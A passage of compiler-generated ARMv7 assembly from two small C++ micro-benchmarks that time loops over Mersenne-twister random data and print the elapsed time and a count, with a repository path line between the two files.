mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB1_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
vmov s0, r0
add r0, r4, r5
add r5, r5, #8
vcvt.f64.s32 d16, s0
cmp r5, r8
vstr d16, [r0]
bne .LBB1_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
vmov.f64 d16, #-1.000000e+00
movw r0, #8168
movt r0, #1953
.LBB1_6: @ =>This Inner Loop Header: Depth=1
add r1, r4, r5
add r5, r5, #8
vldmia r1, {d17, d18, d19, d20}
vadd.f64 d18, d18, d16
vadd.f64 d17, d17, d16
vadd.f64 d19, d19, d16
vmul.f64 d18, d18, d18
vmul.f64 d17, d17, d17
vadd.f64 d20, d20, d16
vmul.f64 d19, d19, d19
vadd.f64 d17, d17, d18
vmul.f64 d18, d20, d20
vadd.f64 d17, d17, d19
vadd.f64 d17, d17, d18
vcmpe.f64 d17, #0
vmrs APSR_nzcv, fpscr
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
cmp r5, r0
bne .LBB1_6
@ BB#7:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp4:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp5:
@ BB#8:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI1_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp6:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp7:
@ BB#9: @ %_ZNSolsEd.exit
.Ltmp8:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp9:
@ BB#10: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp10:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp11:
@ BB#11: @ %_ZNSolsEj.exit
.Ltmp12:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp13:
@ BB#12: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB1_14
@ BB#13:
mov r0, r4
bl _ZdlPv
.LBB1_14: @ %_ZNSt6vectorIdSaIdEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB1_15:
.Ltmp14:
mov r5, r0
cmp r4, #0
beq .LBB1_18
@ BB#16:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB1_17:
.Ltmp3:
mov r5, r0
.LBB1_18: @ %_ZNSt6vectorIdSaIdEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#19:
.LCPI1_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp15:
.size main, .Ltmp15-main
.Leh_func_end1:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table1:
.Lexception1:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp1-.Leh_func_begin1 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp2-.Ltmp1 @ Call between .Ltmp1 and .Ltmp2
.long .Lset1
.Lset2 = .Ltmp3-.Leh_func_begin1 @ jumps to .Ltmp3
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp2-.Leh_func_begin1 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp4-.Ltmp2 @ Call between .Ltmp2 and .Ltmp4
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp4-.Leh_func_begin1 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset6
.Lset7 = .Ltmp14-.Leh_func_begin1 @ jumps to .Ltmp14
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp5-.Leh_func_begin1 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp6-.Ltmp5 @ Call between .Ltmp5 and .Ltmp6
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp6-.Leh_func_begin1 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp13-.Ltmp6 @ Call between .Ltmp6 and .Ltmp13
.long .Lset11
.Lset12 = .Ltmp14-.Leh_func_begin1 @ jumps to .Ltmp14
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp13-.Leh_func_begin1 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end1-.Ltmp13 @ Call between .Ltmp13 and .Leh_func_end1
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB2_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB2_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB2_4
@ BB#3: @ in Loop: Header=BB2_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB2_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB2_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB2_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB2_9
.LBB2_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB2_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB2_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB2_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp16:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp16-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB3_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB3_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB3_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB3_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp17:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp17-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_minus_mul_plus_double.cpp,%function
_GLOBAL__sub_I_minus_mul_plus_double.cpp: @ @_GLOBAL__sub_I_minus_mul_plus_double.cpp
.fnstart
.Leh_func_begin4:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp18:
.size _GLOBAL__sub_I_minus_mul_plus_double.cpp, .Ltmp18-_GLOBAL__sub_I_minus_mul_plus_double.cpp
.Leh_func_end4:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_minus_mul_plus_double.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,661
|
exp/cpp_and_and/ARMv7/s/and.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "and.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #36864
movt r8, #976
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
movw r0, #36852
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
mov r1, r4
ldr r2, [r1, r5]!
cmp r2, #1
bne .LBB0_9
@ BB#7: @ in Loop: Header=BB0_6 Depth=1
ldr r2, [r1, #4]
cmp r2, #1
ldreq r2, [r1, #8]
cmpeq r2, #1
bne .LBB0_9
@ BB#8: @ in Loop: Header=BB0_6 Depth=1
ldr r1, [r1, #12]
cmp r1, #1
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
.LBB0_9: @ %.backedge
@ in Loop: Header=BB0_6 Depth=1
add r5, r5, #4
cmp r5, r0
bne .LBB0_6
@ BB#10:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#11:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#12: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#13: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#14: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#15: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_17
@ BB#16:
mov r0, r4
bl _ZdlPv
.LBB0_17: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_18:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_21
@ BB#19:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_20:
.Ltmp2:
mov r5, r0
.LBB0_21: @ %_ZNSt6vectorIiSaIiEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#22:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
